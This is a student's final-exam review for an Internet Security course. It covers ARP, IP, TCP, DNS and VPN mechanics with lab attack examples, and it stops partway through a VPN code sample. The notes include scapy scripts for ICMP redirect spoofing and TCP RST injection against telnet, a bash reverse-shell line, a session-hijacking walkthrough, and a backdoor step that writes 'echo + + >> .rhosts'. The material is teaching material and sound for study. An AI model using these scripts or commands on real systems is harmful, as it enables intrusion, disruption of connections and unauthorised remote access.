CSE-644: Internet Security (Final Review)

04 May 2020

Exam date/time (Spring 2020)
Sniff/spoof
ARP: Address Resolution Protocol
IP: Internet Protocol
TCP: Transmission Control Protocol
DNS: Domain Name System
VPN: Virtual Private Network
Linux Firewall
PKI (Public Key Infrastructure)
TLS: Transport Layer Security
Secret-key Encryption
One-way Hash Function
BGP: Border Gateway Protocol

Exam date/time (Spring 2020)

May 05, 3-5 PM (online exam due to coronavirus!)

Sniff/spoof

Promiscuous mode: the NIC passes every frame it receives to the kernel. Normally, only frames whose destination MAC address matches the NIC (plus broadcast frames) are passed to the kernel; all other frames are dropped by the hardware.
Monitor mode: the counterpart of promiscuous mode for wireless NICs. It requires special hardware support. Because wireless transmission works on different channels, it is sometimes impossible to capture all traffic in the physical world.
BSD Packet Filter (BPF)
- A filtering mechanism implemented inside the kernel.
- The filter runs in kernel space because it is costly to copy every packet from kernel space to user space only to discard most of them there.
- BPF Syntax
Packet sniffing/spoofing
- Sniff: raw socket, pcap, scapy
- Spoof: raw socket, scapy
Endianness
- Big endian: most significant byte first (e.g. Network, IBM PowerPC)
- Little endian: least significant byte first (e.g. x86, Qualcomm Hexagon)
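The difference between the two byte orders can be seen with a short Python sketch. The value `0x12345678` and the port number 9090 are arbitrary examples; `struct` is the standard-library packing module.

```python
import struct
import sys

value = 0x12345678

big = struct.pack(">I", value)     # big endian: most significant byte first
little = struct.pack("<I", value)  # little endian: least significant byte first

print(big.hex())      # 12345678
print(little.hex())   # 78563412
print(sys.byteorder)  # byte order of the machine running this script

# "!" is struct's alias for network byte order, which is big endian.
port_on_wire = struct.pack("!H", 9090)
print(port_on_wire.hex())  # 2382
```

This is why header fields such as port numbers need `htons`-style conversion on x86 before being written into a packet.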

ARP: Address Resolution Protocol

arp

Purpose of ARP protocol: find the corresponding MAC address of an IP address inside a local network.
Three ways to conduct ARP cache poisoning
- Identities: M (attacker), A (victim), B
- Goal: on machine A, B’s IP address is associated with M’s MAC address.
- Using ARP request
  - Spoof a tampered request on behalf of B to A (as if B is requesting A’s MAC address)
  - ARP request
```
OPER=1
SHA=M's MAC
SPA=B's IP
TPA=A's IP
```
- Using ARP reply
  - ARP reply (as if B is replying A’s ARP request)
```
OPER=2
SHA=M's MAC
SPA=B's IP
THA=A's MAC
TPA=A's IP
```
- Using ARP gratuitous message
  - Gratuitous message: a broadcast ARP message informing address changes to the entire network.
  - Characteristics: OPER=1, SPA=TPA, THA=BROADCAST
  - ARP packet
```
OPER=1
SHA=M's MAC
SPA=B's IP
THA=BROADCAST
TPA=B's IP
```
We cannot use ARP to attack remote computers because ARP packets will not be routed on the Internet.
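As a rough illustration, the three poisoning messages above can be laid out as raw 28-byte ARP payloads. This sketch only builds the bytes and does not send anything. All MAC and IP addresses are hypothetical, the helper names `mac_to_bytes` and `build_arp` are made up for this example, and the all-zero THA in the request is an assumption (the notes leave THA unspecified for requests).

```python
import socket
import struct

def mac_to_bytes(mac):
    """Convert 'aa:bb:cc:dd:ee:ff' into 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))

def build_arp(oper, sha, spa, tha, tpa):
    """Pack the 28-byte ARP payload for IPv4 over Ethernet."""
    return struct.pack(
        "!HHBBH6s4s6s4s",
        1,                      # HTYPE: Ethernet
        0x0800,                 # PTYPE: IPv4
        6,                      # HLEN: MAC address length
        4,                      # PLEN: IPv4 address length
        oper,                   # OPER: 1 = request, 2 = reply
        mac_to_bytes(sha),      # SHA: sender hardware address
        socket.inet_aton(spa),  # SPA: sender protocol address
        mac_to_bytes(tha),      # THA: target hardware address
        socket.inet_aton(tpa),  # TPA: target protocol address
    )

# Hypothetical addresses, for illustration only.
M_MAC = "08:00:27:aa:bb:cc"
A_MAC = "08:00:27:11:22:33"
A_IP, B_IP = "10.0.2.6", "10.0.2.7"
BROADCAST = "ff:ff:ff:ff:ff:ff"

request = build_arp(1, M_MAC, B_IP, "00:00:00:00:00:00", A_IP)
reply = build_arp(2, M_MAC, B_IP, A_MAC, A_IP)
gratuitous = build_arp(1, M_MAC, B_IP, BROADCAST, B_IP)

for name, pkt in [("request", request), ("reply", reply), ("gratuitous", gratuitous)]:
    print(name, len(pkt), pkt.hex())
```

In all three cases the poisoned mapping is carried by the sender fields: SPA is B's IP while SHA is M's MAC.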

IP: Internet Protocol

ipv4-hdr

IP Header
- Version: 4
- Internet Header Length (IHL): length of the IP header, counted in 4-byte words. The minimum is 5, because the minimal IP header size is 20 bytes.
- Total length: the length of the entire packet, including header and data. Since it has 16 bits, the maximum size of an IP packet is $2^{16} - 1 = 65535$ bytes.
- Identification: To identify the group of fragments of a single IP datagram.
- Flags:
  - Bit 0: Reserved, must be zero
  - Bit 1: Don’t fragment (DF) - can be used for path MTU discovery
  - Bit 2: More fragments (MF)
- Fragment offset: the offset of this fragment's data within the original datagram, counted in units of 8 bytes.
- Time to live: prevents IP datagrams from persisting on the Internet forever by limiting a packet's lifetime.
- Protocol: specifies the protocol of the payload.
IP Address
- CIDR Notation
  - 192.168.100.14/24 represents the IPv4 address 192.168.100.14 and its associated routing prefix 192.168.100.0, or equivalently, its subnet mask 255.255.255.0, which has 24 leading 1-bits.
  - the IPv4 block 192.168.100.0/22 represents the 1024 IPv4 addresses from 192.168.100.0 to 192.168.103.255.
  - 192.168.100.0/24 is equivalent to 192.168.100.0/255.255.255.0.
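The CIDR facts above can be checked with Python's standard `ipaddress` module. This is only a small verification sketch using the addresses from the bullets.

```python
import ipaddress

# An address together with its prefix length.
iface = ipaddress.ip_interface("192.168.100.14/24")
print(iface.network)   # 192.168.100.0/24
print(iface.netmask)   # 255.255.255.0

# A /22 block leaves 32 - 22 = 10 host bits, i.e. 2**10 addresses.
block = ipaddress.ip_network("192.168.100.0/22")
print(block.num_addresses)   # 1024
print(block[0], block[-1])   # 192.168.100.0 192.168.103.255

# Prefix-length and netmask notations describe the same network.
same = ipaddress.ip_network("192.168.100.0/255.255.255.0")
print(same == ipaddress.ip_network("192.168.100.0/24"))  # True
```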

IP fragmentation

The fragmented packets will have the same ID.
All packets except the last one will have MF flag set.

Sample fragmented IP traffic

Total size of IP payload: UDPHDR(8) + PAYLOAD(10000)=10008
The length of each packet: ETHERHDR(14) + IPHDR(20) + IP payload
Therefore, each packet of length 1514 contains a 1500-byte IP packet, which means 1480 bytes of IP payload. The packet of length 1162 contains $1162-14-20=1128$ bytes of payload. The total size of payload is $1480 \times 6 + 1128 = 10008$.

No.	Source	Destination	Protocol	Length	Info
5	192.168.0.100	192.168.0.1	IPv4	1514	Fragmented IP protocol (proto=UDP 17, off=0, ID=0001) [Reassembled in #11]
6	192.168.0.100	192.168.0.1	IPv4	1514	Fragmented IP protocol (proto=UDP 17, off=1480, ID=0001) [Reassembled in #11]
7	192.168.0.100	192.168.0.1	IPv4	1514	Fragmented IP protocol (proto=UDP 17, off=2960, ID=0001) [Reassembled in #11]
8	192.168.0.100	192.168.0.1	IPv4	1514	Fragmented IP protocol (proto=UDP 17, off=4440, ID=0001) [Reassembled in #11]
9	192.168.0.100	192.168.0.1	IPv4	1514	Fragmented IP protocol (proto=UDP 17, off=5920, ID=0001) [Reassembled in #11]
10	192.168.0.100	192.168.0.1	IPv4	1514	Fragmented IP protocol (proto=UDP 17, off=7400, ID=0001) [Reassembled in #11]
11	192.168.0.100	192.168.0.1	UDP	1162	50000 -> 50000 Len=10000
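The offsets and lengths in the capture can be reproduced with a small calculation. This is a sketch under the assumptions of a 1500-byte MTU and a 20-byte IP header without options; the function name `fragment` is made up for this example.

```python
def fragment(ip_payload_len, mtu=1500, ip_hdr_len=20):
    """Return (offset_bytes, data_len, more_fragments) for each fragment."""
    # Every fragment except the last must carry a multiple of 8 bytes,
    # because the fragment offset field counts 8-byte units.
    max_data = (mtu - ip_hdr_len) // 8 * 8
    fragments = []
    offset = 0
    while offset < ip_payload_len:
        data_len = min(max_data, ip_payload_len - offset)
        more = offset + data_len < ip_payload_len
        fragments.append((offset, data_len, more))
        offset += data_len
    return fragments

frags = fragment(8 + 10000)  # UDP header + UDP payload
for off, length, mf in frags:
    frame_len = 14 + 20 + length  # Ethernet header + IP header + data
    print(f"off={off:5d} offset_field={off // 8:4d} MF={int(mf)} frame_len={frame_len}")
```

The loop yields six fragments of 1480 bytes with MF set, followed by a final 1128-byte fragment at offset 8880 with MF cleared, matching frames 5 to 11.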

DOS attack with IP fragmentation: send a lot of fragments with the MF flag set and different IDs, so that the victim keeps allocating memory for datagrams that are never completed. This problem has since been fixed, so the attack no longer works.
ICMP redirect attack
- An ICMP redirect is an error message sent by a router to the sender of an IP packet. Redirects are used when a router believes a packet is being routed suboptimally and wants to inform the sending host that it should forward subsequent packets for that destination through a different gateway.
- By default, Linux does not process redirect packets. To enable this, run:
```
[02/09/20]seed@vm2:~$ sudo sysctl net.ipv4.conf.all.accept_redirects=1
net.ipv4.conf.all.accept_redirects = 1
```
- The construction of an ICMP redirect attack packet
  - We spoof an ICMP message on behalf of the network's router (10.0.2.1) and send it to the victim (10.0.2.6), telling the victim that packets sent to 10.0.0.1 should be routed through 10.0.2.5.
```
from scapy.all import *
ip1 = IP(src='10.0.2.1', dst='10.0.2.6')
icmp = ICMP(type=5, code=1,gw='10.0.2.5')
ip2 = IP(src='10.0.2.6', dst='10.0.0.1')
udp = UDP(dport=9090)
packet = ip1/icmp/ip2/udp
send(packet)
```
- If the destination IP belongs to a machine on the local network, this may not work, because those packets are delivered directly and are never routed through a gateway.
UDP: User Datagram Protocol
- UDP checksum is not always verified

TCP: Transmission Control Protocol

tcphdr

TCP Header
- Data offset: the offset of the start of the actual data, i.e. the TCP header length, counted in 4-byte words. The minimal size of a TCP header is 20 bytes, so the minimum value of this field is 5.
- Flags
  - SYN: synchronize sequence numbers. This is used during the three-way handshake.
  - ACK: indicates the ACK field is significant. It is set on every packet after the initial SYN.
  - RST: reset the connection. Basically, terminates the connection immediately.
- Window size: the size of receive window. This field is used for flow control.
- Urgent pointer: if the urgent flag is set, this field gives the offset from the sequence number to the last byte of urgent data. Usually, urgent data has special handlers.
TCP Checksum computation

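To compute the TCP checksum, we construct a buffer consisting of a pseudo-header followed by the TCP header and data.
- The pseudo-header contains the source IP address, the destination IP address, a zero byte, the protocol number (6 for TCP) and the segment length.
- The segment length is the total length of TCP header and payload.
- The original TCP header and payload are appended after this pseudo-header. Note that the checksum field in the TCP header must be set to zero first!
The checksum is the 16-bit one's-complement Internet checksum (the same algorithm as the IP header checksum) of the concatenated result. After computing the checksum, fill the value back into the TCP header.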
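The computation can be sketched in Python as follows. The function names `internet_checksum` and `tcp_checksum` are made up for this example, and the header is a hand-packed 20-byte SYN whose addresses and ports are borrowed from the sample traffic purely for illustration.

```python
import socket
import struct

def internet_checksum(data):
    """16-bit one's-complement checksum over data."""
    if len(data) % 2:
        data += b"\x00"  # pad to a whole number of 16-bit words
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:   # fold the carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def tcp_checksum(src_ip, dst_ip, segment):
    """segment = TCP header + payload, with the checksum field set to zero."""
    pseudo = struct.pack(
        "!4s4sBBH",
        socket.inet_aton(src_ip),
        socket.inet_aton(dst_ip),
        0,                    # reserved zero byte
        socket.IPPROTO_TCP,   # protocol number 6
        len(segment),         # TCP header + payload length
    )
    return internet_checksum(pseudo + segment)

# 20-byte SYN header: sport, dport, seq, ack, data offset, flags,
# window, checksum (zero for now), urgent pointer.
header = struct.pack("!HHIIBBHHH", 65117, 9090, 0, 0, 5 << 4, 0x02, 65535, 0, 0)
csum = tcp_checksum("192.168.0.111", "192.168.0.100", header)

# Write the checksum back into bytes 16-17 of the TCP header.
filled = header[:16] + struct.pack("!H", csum) + header[18:]

# A receiver that recomputes over the filled segment gets zero.
print(tcp_checksum("192.168.0.111", "192.168.0.100", filled) == 0)
```

The final check works because adding a value to its one's complement always gives 0xFFFF, whose complement is zero.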

Sample TCP traffic

No.	Source	Destination	Protocol	Length	Info
58	192.168.0.111	192.168.0.100	TCP	78	65117 > 9090 [SYN] Seq=0 Win=65535 Len=0
59	192.168.0.100	192.168.0.111	TCP	74	9090 > 65117 [SYN, ACK] Seq=0 Ack=1 Win=65160 Len=0
60	192.168.0.111	192.168.0.100	TCP	66	65117 > 9090 [ACK] Seq=1 Ack=1 Win=131712 Len=0
93	192.168.0.111	192.168.0.100	TCP	87	65117 > 9090 [PSH, ACK] Seq=1 Ack=1 Win=131712 Len=21
94	192.168.0.100	192.168.0.111	TCP	66	9090 > 65117 [ACK] Seq=1 Ack=22 Win=65152 Len=0
138	192.168.0.100	192.168.0.111	TCP	101	9090 > 65117 [PSH, ACK] Seq=1 Ack=22 Win=65152 Len=35
139	192.168.0.111	192.168.0.100	TCP	66	65117 > 9090 [ACK] Seq=22 Ack=36 Win=131712 Len=0
145	192.168.0.111	192.168.0.100	TCP	77	65117 > 9090 [PSH, ACK] Seq=22 Ack=36 Win=131712 Len=11
146	192.168.0.100	192.168.0.111	TCP	66	9090 > 65117 [ACK] Seq=36 Ack=33 Win=65152 Len=0
150	192.168.0.111	192.168.0.100	TCP	66	65117 > 9090 [FIN, ACK] Seq=33 Ack=36 Win=131712 Len=0
151	192.168.0.111	192.168.0.100	TCP	60	65117 > 9090 [RST, ACK] Seq=34 Ack=36 Win=131712 Len=0

SEQ and ACK numbers
- Suppose A is sending a packet to B. Think of the SEQ number as a pointer to the first byte of this packet in A's send buffer (the next unsent byte), and think of the ACK number as a pointer to the next byte A expects from B. For example, when A sends a packet with SEQ=0, LEN=10, we know that the ACK from B will be 10: A has sent buf[0] to buf[9], and B is now expecting buf[10].
- Sample traffic
```
(Packet 1: A -> B) SEQ=x1      ACK=y1       LEN=z1
(Packet 2: B -> A) SEQ=y1      ACK=x1+z1    LEN=0   (ACK Packet)
(Packet 3: B -> A) SEQ=y1      ACK=x1+z1    LEN=z2
(Packet 4: A -> B) SEQ=x1+z1   ACK=y1+z2    LEN=0   (ACK Packet)
```
Three-way handshake: how a TCP connection starts
- Client sends SYN packet with initial SEQ
- Server responds with SYN+ACK packet with initial SEQ and incremented ACK number.
- Client responds with an ACK packet carrying the incremented ACK number.
- Despite the message length being zero, the ACK number is incremented by one, because a SYN consumes one sequence number.
```
(Packet 1: A -> B) SEQ=x1                   LEN=0  (SYN)
(Packet 2: B -> A) SEQ=y1      ACK=x1+1     LEN=0  (SYN+ACK)
(Packet 3: A -> B) SEQ=x1+1    ACK=y1+1     LEN=0  (ACK)
```
SYN Flooding Attack
- Each server has a connection queue that holds half-open connections (SYN received, final ACK not yet received). SYN flooding spoofs a large number of SYN packets to the server, which fills this queue with malicious entries. Once the queue is full, the server can no longer accept new connections.
- Countermeasure: SYN Cookie
  - When the connection queue is full, the server encodes some information about the connection (e.g. time, client's IP, port number) into the sequence number field of its SYN+ACK reply. The connection itself is not stored, which prevents the DOS attack.
  - If the SYN came from an attacker with a spoofed source address, he will not receive the SYN+ACK (because the source IP address is not his!) and cannot answer it correctly.
  - If the client is indeed interested in talking to the server, it will send an ACK packet back. The server checks whether this packet carries the correct ACK number, which must match the value encoded from the client's information. If so, the connection is established.
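The idea behind SYN cookies can be sketched as a stateless check. This is a deliberately simplified illustration and not the layout Linux actually uses: the HMAC construction, `SECRET`, `SLOT_SECONDS`, the function names and the addresses are all assumptions made for this example.

```python
import hashlib
import hmac
import struct

SECRET = b"server-local-secret"  # hypothetical key known only to the server
SLOT_SECONDS = 64                # assumed granularity of the time counter

def make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, now):
    """Derive the server's initial SEQ from connection data instead of storing it."""
    slot = int(now) // SLOT_SECONDS
    msg = f"{src_ip}:{src_port}>{dst_ip}:{dst_port}|{client_isn}|{slot}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return struct.unpack("!I", digest[:4])[0]

def check_ack(src_ip, src_port, dst_ip, dst_port, seq, ack, now):
    """Validate the final ACK of the handshake without any stored state."""
    client_isn = (seq - 1) % 2**32  # the client's SYN used SEQ = ISN
    cookie = (ack - 1) % 2**32      # the client acknowledges cookie + 1
    for age in (0, 1):              # accept the current and the previous slot
        t = now - age * SLOT_SECONDS
        if make_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, t) == cookie:
            return True
    return False

now = 1_588_600_000  # arbitrary timestamp for the example
cookie = make_cookie("10.0.2.5", 40000, "10.0.2.6", 80, 1000, now)

# A genuine client saw the SYN+ACK and answers with ACK = cookie + 1.
print(check_ack("10.0.2.5", 40000, "10.0.2.6", 80, 1001, (cookie + 1) % 2**32, now + 3))

# A spoofer who never saw the SYN+ACK has to guess the ACK number.
print(check_ack("10.0.2.5", 40000, "10.0.2.6", 80, 1001, (cookie + 2) % 2**32, now + 3))
```

The server keeps nothing between the SYN and the ACK; everything it needs is recomputed from the ACK packet itself.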

TCP RST Attack

Local attack: sniff the TCP packets on the LAN and spoof RST packets with correct SEQ and ACK numbers.
Remote attack: the attacker cannot sniff the traffic, so he spoofs RST packets with random SEQ and ACK numbers and hopes that one of them is accepted.

Python attack code

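from scapy.all import *

def rst_attack(pkt):
    # Skip packets that already carry RST (including our own spoofed ones).
    if 'R' in pkt[TCP].flags:
        return

    # We impersonate the receiver of pkt, so SEQ and ACK swap roles.
    baseSeq = pkt[TCP].ack
    baseAck = pkt[TCP].seq
    ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
    tcp = TCP(sport=pkt[TCP].dport,
              dport=pkt[TCP].sport,
              flags='AR',
              seq=baseSeq,
              ack=baseAck+1)  # +1 assumes pkt carried one byte (e.g. a telnet keystroke)
    outPacket = ip/tcp

    send(outPacket)

# Watch telnet traffic going to 10.0.2.7 and reset every connection seen.
sniff(filter='dst host 10.0.2.7 and tcp port 23', prn=rst_attack)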

Switch src IP and dst IP
Flags=AR
Fill the correct SEQ and ACK numbers

TCP Session Hijacking
- Sample attack
  - The wireshark capture of the last packet
```
17  10.0.2.6 10.0.2.7 TCP 66 58520 → 23 [ACK] Seq=1911510874 Ack=145612526 Win=237 Len=0
```
  - Spoof a packet
    SRC IP=10.0.2.7 DST IP=10.0.2.6 SEQ=145612526 ACK=1911510874
- It is better to target ACK packets with LEN=0! In this case, the sender is idle, so we do not need to race against its next real packet on the network.
- Why does the telnet session freeze?
  
  If we hijack the session by spoofing a packet from A to B, B advances the sequence number it expects from A and acknowledges the spoofed data. A never sent that data, so A considers the ACK number in B's packets invalid and drops them. Therefore, A never learns the new sequence state. Meanwhile, A's own packets still use the old SEQ number, which B no longer accepts, so they are dropped as well. Neither side can make progress, and the session freezes.
- Setting up a reverse shell
```
/bin/bash -i > /dev/tcp/10.0.2.5/9090 0<&1 2>&1
```
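  - > /dev/tcp/10.0.2.5/9090 redirects stdout (file descriptor 1) to a TCP connection to 10.0.2.5, port 9090.
  - 0<&1 makes stdin (file descriptor 0) read from the same connection as stdout.
  - 2>&1 redirects stderr (file descriptor 2) to the same connection as stdout.
  - & means the number that follows is a file descriptor, not a file name.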
Mitnick attack
- Background: there is a protected machine “X-Terminal” and a trusted server. The remote shell program is the legacy rsh, which supports IP-address based authentication: a host listed in the file .rhosts can log in automatically. In this case, the IP address of the trusted server is in this file, which means the trusted server can log in to X-Terminal without any authentication. Our goal is to set up a backdoor on X-Terminal so that we can also log in to X-Terminal without authentication.
- The attack
  1. SYN flood the trusted server
    
    We need to conduct a DOS attack on the trusted server first, so that it cannot interfere with the spoofed connection. In the lab scenario, we simply disconnect the trusted server. However, a server under a real SYN flood can still respond to ARP requests (only its TCP queue is attacked), whereas a disconnected one cannot. To make up for this, we add a static ARP entry for the trusted server on X-Terminal.
  2. Spoof a SYN packet on behalf of the trusted server to X-Terminal
    
    In this step, we try to establish a connection to the X-Terminal.
  3. Spoof an ACK packet to X-Terminal
    
    After step 2, X-Terminal will send a SYN+ACK message. However, since the source IP address we used is the trusted server's, we will not receive that packet. Fortunately, the trusted server has been blocked and will not respond either. This grants us time to hijack the connection. To spoof a correct ACK packet, we need to know the sequence number in X-Terminal's SYN+ACK response, because our ACK number must be that value plus one. In reality, Mitnick worked out the pattern of initial sequence numbers generated by X-Terminal and predicted the value.
  4. Spoof a command to install the backdoor
    
    Because the IP of the trusted server is already in .rhosts, we are able to send and execute commands on X-Terminal without any further authentication. We simply add our IP address to .rhosts and the attack is done. In reality, we can run echo + + >> .rhosts to allow arbitrary IP addresses. This will hide the attacker's identity.

DNS: Domain Name System

dnshdr

DNS server listens to UDP port 53
The hierarchical structure of DNS
- Root domain -> top level domains -> second-level domains
- A DNS query goes step by step from higher levels to lower levels, until a definitive answer is found.
- The DNS hierarchy is divided into zones, where each zone is a separately configured portion of the DNS name space.
DNS Header
- A complete DNS packet: IPHDR+UDPHDR+DNSHDR
- QDCOUNT: number of question records
- ANCOUNT: number of answer records
- NSCOUNT: number of authority records
- ARCOUNT: number of additional records
- QR flag: specifies if the packet is a query (0) or response (1)
- AA flag: specifies if the answer is authoritative or not. An authoritative answer comes from a name server that can provide a definitive answer for the domain name in the question section. For example, if I query www.google.com from a.gtld-servers.net, the response will not have the AA flag because the domain name is not managed by this server. However, if I query www.google.com from one of Google’s name servers (e.g. ns1.google.com), the answer will have the AA flag.
- RD flag: specifies if recursion is desired. If the query is recursive, the DNS server itself will iteratively search for the final answer to the DNS query. Whether this is available or not depends on the DNS server’s configuration.
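The header fields above occupy the first 12 bytes of a DNS message. The following sketch decodes them with `struct`; the function name `parse_dns_header` is made up for this example, and the sample bytes are constructed by hand to mirror a response with flags `qr rd` and counts 1, 0, 13 and 27.

```python
import struct

def parse_dns_header(data):
    """Decode the fixed 12-byte DNS header."""
    ident, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    return {
        "id": ident,
        "qr": (flags >> 15) & 1,  # 0 = query, 1 = response
        "aa": (flags >> 10) & 1,  # authoritative answer
        "rd": (flags >> 8) & 1,   # recursion desired
        "qdcount": qd,            # question records
        "ancount": an,            # answer records
        "nscount": ns,            # authority records
        "arcount": ar,            # additional records
    }

# Hand-built header: id=63490, flags=0x8100 (QR and RD set), counts 1/0/13/27.
sample = struct.pack("!HHHHHH", 63490, 0x8100, 1, 0, 13, 27)
print(parse_dns_header(sample))
```

A referral from a root server has QR set but AA clear, with the useful data in the authority and additional sections rather than the answer section.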

DNS Records

A DNS packet carries records in four sections, matching the four counters in the header: question records, answer records, authority records and additional records.

Sample dig result (query www.google.com from root servers)

Record type: NS (authority), A (IP address)
172800: TTL in terms of seconds. Specifies how long this record should exist in DNS cache.

; <<>> DiG 9.11.3-1ubuntu1.11-Ubuntu <<>> www.google.com @a.root-servers.net -4
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63490
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 27
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1472
;; QUESTION SECTION:
;www.google.com.			IN	A

;; AUTHORITY SECTION:
com.			172800	IN	NS	a.gtld-servers.net.
com.			172800	IN	NS	b.gtld-servers.net.
com.			172800	IN	NS	c.gtld-servers.net.
com.			172800	IN	NS	d.gtld-servers.net.
com.			172800	IN	NS	e.gtld-servers.net.
com.			172800	IN	NS	f.gtld-servers.net.
com.			172800	IN	NS	g.gtld-servers.net.
com.			172800	IN	NS	h.gtld-servers.net.
com.			172800	IN	NS	i.gtld-servers.net.
com.			172800	IN	NS	j.gtld-servers.net.
com.			172800	IN	NS	k.gtld-servers.net.
com.			172800	IN	NS	l.gtld-servers.net.
com.			172800	IN	NS	m.gtld-servers.net.

;; ADDITIONAL SECTION:
a.gtld-servers.net.	172800	IN	A	192.5.6.30
b.gtld-servers.net.	172800	IN	A	192.33.14.30
c.gtld-servers.net.	172800	IN	A	192.26.92.30
d.gtld-servers.net.	172800	IN	A	192.31.80.30
e.gtld-servers.net.	172800	IN	A	192.12.94.30
f.gtld-servers.net.	172800	IN	A	192.35.51.30
g.gtld-servers.net.	172800	IN	A	192.42.93.30
h.gtld-servers.net.	172800	IN	A	192.54.112.30
i.gtld-servers.net.	172800	IN	A	192.43.172.30
j.gtld-servers.net.	172800	IN	A	192.48.79.30
k.gtld-servers.net.	172800	IN	A	192.52.178.30
l.gtld-servers.net.	172800	IN	A	192.41.162.30
m.gtld-servers.net.	172800	IN	A	192.55.83.30

;; Query time: 26 msec
;; SERVER: 198.41.0.4#53(198.41.0.4)
;; WHEN: Sat May 02 18:14:53 EDT 2020
;; MSG SIZE  rcvd: 839

Local DNS attack
- Providing an authoritative answer for a specific domain
  
  In the lab scenario, we would like to specify an authoritative domain name server for a certain domain. Normally, we need to purchase a domain to do so. However, there is a way to avoid the cost. Suppose there are three machines A (User), B (Local DNS Server) and C (Authoritative Name Server). The following configuration allows A to view C as the domain name’s authoritative name server.
  1. On machine A, set the DNS server to be B.
  2. On machine B, add a “forward” zone to the BIND9 configuration to forward the DNS requests of a specific zone to C.
  3. Set up an authoritative zone on C’s BIND9 zone file.
- The attack
  1. The attacker sniffs DNS requests from A.
  2. Upon seeing a DNS request, the attacker constructs a DNS reply. He sets the authority section for the domain name to his own DNS server and then spoofs the reply back.
- We choose to change the authority section because the forged name server record gets cached, so any further DNS query on this domain will go to the attacker’s DNS server.
Remote DNS attack (Kaminsky attack)
- Challenges
  - We do not know when the victim will send out DNS query.
  - If the reply is cached by the victim, it will take a long time before the attacker can try again.
  - We do not know the DNS transaction number and UDP source port.
- The attack
  1. The attacker queries the victim DNS server for a random name in example.com (e.g. abcdef.example.com). Because the victim does not have the answer for this name in its cache, it will send out a DNS query.
  2. While the victim is waiting for the reply, the attacker floods it with spoofed DNS replies, each with a guessed transaction number and UDP destination port number. In each reply, the answer section contains an IP resolution for the random name, and the authority section names the attacker’s DNS server as the name server for example.com. If one of the replies has the correct combination, the attack succeeds, and the name server for example.com becomes the attacker’s name server.
  3. If the spoofed replies fail, the attacker repeats from step 1 with a new random name. Because the new name is not in the victim’s DNS cache, the victim will send out a new DNS query.
DNS Rebinding attack
- Background: the attack is used to defeat the Same Origin Policy (SOP) of web browsers. Suppose there are two machines A and B behind a firewall, and A is invisible from outside. When B’s user browses the attacker’s website, the attacker normally has no access to A, because the SOP only allows AJAX code to interact with the website’s own domain. The DNS rebinding attack works by rebinding the attacker’s domain name to A’s IP address. When the AJAX code sends requests, it actually talks to machine A. This allows the attacker to manipulate the invisible machine behind the firewall.
- The attack
  1. At the beginning, the attacker’s domain name is mapped to its real IP address. The TTL of the DNS response is set to be very small (e.g. 2 seconds) for the rebinding attack to work.
  2. The user of machine B browses the attacker’s website. The malicious JavaScript code begins to run on B.
  3. After a while, the AJAX code on the page sends a request to the attacker’s domain. Because the cached DNS record has already expired, B will query the IP address again from the attacker’s name server. This time, the attacker’s name server answers with A’s IP address. Therefore, the request is sent to A.
Countermeasure
- DNSSEC: protects DNS responses with digital signatures, so that a resolver can verify that the records come from the zone's owner.
Amplification attack

One can spoof DNS queries (which are small) with the victim’s IP as the source address. The DNS servers then send their responses (which are much larger) to the victim, amplifying the attacker's traffic.

VPN: Virtual Private Network

vpn

This is the architecture of a TUN/TAP based VPN. The mechanism of some IPsec based VPN is a little bit different.
TUN/TAP Interface: they serve as a way to extract packets from the kernel space. TUN/TAP interfaces have two ends: the network end and file system end. In the routing table, we can route packets to the network end of TUN/TAP interface. Then, the user program can read packets out from TUN/TAP’s file system end.
How VPN works

Suppose there are three computers A (VPN user), B (VPN server) and C (machine behind firewall).
- A’s IP: 10.0.2.5
- B’s IP: 10.0.2.6, 192.168.60.1 (two NICs)
- C’s IP: 192.168.60.101
1. A TUN interface is created on A with IP address 192.168.50.5. The 192.168.50.0/24 subnet is reserved for TUN interfaces. In A’s routing table, all traffic that goes to 192.168.50.0/24 is routed to tun0 (usually this is set automatically when you assign an IP address to a TUN interface). All traffic that goes to 192.168.60.0/24 is routed to tun0 as well.
2. A VPN program on A reads packets out from tun0 and sends them to the VPN server via the Internet. (The src IP of packets coming out from tun0 is 192.168.50.5, because they are routed and emitted by tun0.)
3. The VPN server program on B receives the packet. On B, it also has a TUN interface called tun1 with IP address 192.168.50.1. The VPN program will write packets into tun1. The OS will route packets to the NIC with IP address 192.168.60.1, and C will receive the packet.
4. For packets to come back, on C, the 192.168.50.0/24 subnet is routed to 192.168.60.1.
- Corresponding VPN setup script
  - Machine A
    sudo ifconfig tun0 192.168.50.5/24 up
    sudo route add -net 192.168.60.0/24 tun0
  - Machine B (remember to turn on IP forwarding!)
    sudo ifconfig tun1 192.168.50.1/24 up
    sudo sysctl net.ipv4.ip_forward=1
  - Machine C
    sudo route add -net 192.168.50.0/24 gw 192.168.60.1
Maintaining packet boundary

When packets are sent from A to B over UDP, each read system call returns exactly one datagram's payload, so the packet boundary is maintained automatically. However, TCP is a byte stream, and the number of bytes returned by a read is undetermined: it could be less than, equal to or larger than the actual packet size. Therefore, special measures need to be taken to maintain the packet boundary when the protocol between A and B is TCP. For example, we can prepend a header that contains the packet size to each packet.
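A minimal sketch of the length-prefix approach is shown below. The 2-byte big-endian length header and the helper names `send_packet`, `recv_exact` and `recv_packet` are choices made for this example (2 bytes suffice because an IP packet is at most 65535 bytes), and `socket.socketpair()` stands in for the TCP connection between A and B.

```python
import socket
import struct

def send_packet(sock, packet):
    """Prefix the packet with its length so the receiver can find its end."""
    sock.sendall(struct.pack("!H", len(packet)) + packet)

def recv_exact(sock, n):
    """Keep reading until exactly n bytes have arrived."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf

def recv_packet(sock):
    """Read one length header, then exactly that many bytes."""
    (length,) = struct.unpack("!H", recv_exact(sock, 2))
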